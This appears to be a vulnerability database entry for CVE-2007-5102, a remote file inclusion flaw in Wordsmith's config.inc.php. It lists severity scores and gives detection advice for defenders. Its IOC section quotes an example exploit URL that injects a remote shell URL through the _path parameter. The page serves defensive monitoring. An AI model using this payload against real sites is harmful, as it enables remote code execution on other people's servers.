cbcvebase.
CVE-2007-5102
published 2007-09-26

CVE-2007-5102: PHP remote file inclusion vulnerability in config.inc.php in Wordsmith 1.0 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary…

PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
38.56%
98.4th percentile
PHP remote file inclusion vulnerability in config.inc.php in Wordsmith 1.0 RC1, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via a URL in the _path parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
wordsmithwordsmith

Detection & IOCsextracted from sources · hover to see the quote

path/config.inc.php
urlhttp://domain.com/Script_Path/config.inc.php?_path=http://shell.txt?
  • Monitor HTTP requests targeting config.inc.php with a URL-valued '_path' parameter, which is the RFI injection point.
  • The RFI payload appends a '?' after the remote shell URL to nullify any appended local path suffixes (e.g., ?_path=http://shell.txt?). Detect GET requests to config.inc.php where the _path parameter contains 'http://' or 'https://'.
  • Exploitation requires register_globals to be enabled on the target PHP installation. Audit PHP configurations for register_globals=On as a prerequisite indicator.
  • ·The vulnerability is only exploitable when PHP's register_globals directive is enabled; installations with register_globals=Off are not affected.
  • ·The exploit title references version 1.1b while the NVD entry specifies 1.0 RC1; detections should cover both version strings.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.